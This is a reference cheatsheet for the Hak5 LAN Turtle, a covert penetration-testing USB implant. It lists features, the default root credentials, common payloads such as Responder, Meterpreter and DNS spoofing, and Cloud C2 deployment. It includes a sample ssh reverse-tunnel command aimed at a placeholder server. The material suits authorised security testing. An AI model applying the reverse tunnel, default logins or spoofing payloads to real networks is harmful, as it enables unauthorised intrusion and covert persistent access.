Hak5 LAN Turtle Cheatsheet
Hak5 LAN Turtle Cheatsheet¶
Overview¶
The Hak5 LAN Turtle is a covert system administration and penetration testing tool that provides stealthy remote access, network intelligence gathering, and man-in-the-middle capabilities.
Key Features¶
- Covert: Disguised as a generic USB Ethernet adapter.
- Remote Access: Provides a reverse shell to a remote server.
- Network Intelligence: Can be used to scan the network and gather information.
- Man-in-the-Middle: Can be used to intercept and manipulate network traffic.
- Modular: Payloads can be easily created and deployed.
- Cloud C2 Ready: Can be managed remotely via Hak5s Cloud C2 platform.
Hardware Specifications¶
- Processor: ARM
- Memory: 64 MB RAM
- Storage: 512 MB NAND flash
- Networking: 10/100 Ethernet
- Power: USB
Getting Started¶
- Power On: Plug the LAN Turtle into a USB port on a computer.
- Connect to Network: The LAN Turtle will automatically connect to the network through the host computer.
- Access the Shell: Connect to the LAN Turtle via SSH to configure payloads and access the shell.
Default Credentials¶
- IP Address:
172.16.84.1 - Username:
root - Password:
sh3llz
Payload Development¶
Payloads are written in Bash and can be managed through the LAN Turtle web interface or via SSH.
Payload Structure:
#!/bin/bash
# Your payload logic here
# Example: Establish a reverse shell to a remote server
ssh -fN -R 2222:localhost:22 user@your-server.com
Common Payloads¶
- AutoSSH: Automatically establish a persistent reverse shell.
- Responder: A tool for LLMNR, NBT-NS and MDNS poisoning.
- Nmap: Scan the network for hosts and open ports.
- Meterpreter: Establish a Metasploit Meterpreter session.
- DNS Spoofing: Spoof DNS responses to redirect traffic.
Modules¶
The LAN Turtle has a modular framework that allows you to easily install and run pre-built payloads.
turtle-modules: A repository of official and community-contributed modules.turtle-manager: A command-line tool for managing modules.
Cloud C2 Integration¶
The LAN Turtle can be managed remotely using Hak5s Cloud C2 platform.
- Register: Register your LAN Turtle on the Cloud C2 platform.
- Provision: Provision the LAN Turtle with your Cloud C2 settings.
- Deploy: Deploy the LAN Turtle on the target network.
- Manage: Manage the LAN Turtle, deploy payloads, and access the shell from the Cloud C2 dashboard.